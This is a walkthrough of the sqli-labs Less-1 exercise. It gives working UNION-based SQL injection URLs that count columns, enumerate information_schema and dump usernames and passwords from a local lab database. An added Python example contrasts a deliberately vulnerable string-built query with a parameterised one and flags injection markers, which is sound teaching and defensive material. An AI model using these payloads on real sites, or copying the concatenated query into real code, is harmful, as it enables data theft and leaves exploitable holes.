Less-1's yellow-text hint says to input an id (GET request), so append ?id=1 to the URL and press Enter.
An echo position appears, so the initial judgement is that an injection point exists, and that it is a single-quote injection point.
Determine the number of columns in the original query. The statement used is ORDER BY (guessed column count), and binary search narrows the value down: start with a fairly large value for the column count, 10, then 5, then 3. 3 does not error.
Next, get the database name with a UNION SELECT union query.
http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20union%20select%201,2,3%20--%20q (%27 is the single quote, %20 is the space). At this point nothing changes in the output.
That is because there are only two echo positions, and the row from the original query is what gets echoed.
Now set id=-1. id=-1 does not exist, so the echo shows the union row normally.
Next, the database name can be obtained through the echo position.
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),3%20--%20q
The database name is security. Next, dump the table names; there are the following tables:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,%20group_concat(table_name)%20From%20information_schema.tables%20Where%20table_schema=%27security%27%20--%20q
After getting the table names, get the column names of a table the same way (dump the columns).
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema=%27security%27%20and%20table_name=%27users%27%20--%20q
Now the data can be dumped.
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(id,username,password)%20FROM%20users%20--%20q
Dumping the other tables and their data works the same way.
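To show why the ORDER BY and UNION probes above work and what stops them, here is an added example (not part of the walkthrough and not sqli-labs' own code) in Python. It uses an in-memory SQLite table as a constructed stand-in for the lab's users table, a hypothetical lookup_vulnerable function that concatenates the id into the SQL text the way the lab does, a lookup_safe function that binds the value as a parameter instead, and a flag_request function that decodes a request URL and flags the markers the walkthrough's URLs carry. Only the payload shapes already shown on this page are used.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the lab's `users` table (sample rows, not the lab's real data).
SAMPLE_USERS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")]


def build_db():
    """Create an in-memory SQLite database shaped like the walkthrough's target table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Hypothetical lab-style lookup: the query is built by string formatting.

    The request value lands inside the SQL text, so a quote closes the literal and
    everything after it is parsed as SQL. The ORDER BY count oracle and the UNION
    echo from the walkthrough work against exactly this shape.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same lookup with a bound parameter: the value is data, never SQL text."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def query_succeeds(conn, user_id):
    """True if the vulnerable query runs without a SQL error (the ORDER BY oracle)."""
    try:
        lookup_vulnerable(conn, user_id)
        return True
    except sqlite3.OperationalError:
        return False


# Markers for the probes used on this page (constructed and deliberately simple).
INJECTION_MARKERS = re.compile(r"(?i)union\s+select|order\s+by\s+\d+|information_schema|--\s|'")


def flag_request(url):
    """Return the names of query parameters whose decoded value looks injected.

    parse_qs already undoes %27 / %20, so the markers are matched on decoded text.
    The id parameter is additionally required to be a plain integer (allow-list check).
    """
    flagged = set()
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            if INJECTION_MARKERS.search(value):
                flagged.add(name)
            elif name == "id" and not value.lstrip("-").isdigit():
                flagged.add(name)
    return sorted(flagged)


if __name__ == "__main__":
    db = build_db()
    # Column-count oracle from the walkthrough: 10 and 5 raise an error, 3 does not.
    for n in (10, 5, 3):
        ok = query_succeeds(db, f"1' order by {n} -- q")
        print(f"order by {n}:", "no error" if ok else "error")
    payload = "-1' union select 1,2,3 -- q"
    print("vulnerable:", lookup_vulnerable(db, payload))  # the union row is echoed
    print("safe:", lookup_safe(db, payload))              # no row: the payload is just a string
    print("flagged:", flag_request(
        "http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3%20--%20q"))
```

The parameterised lookup is the fix; the allow-list check on id and the marker regex are cheap extra layers for request logging or a WAF rule, not substitutes for it. SQLite is used only so the example runs offline; the concatenation and binding behaviour is the same on MySQL with a driver that supports placeholders.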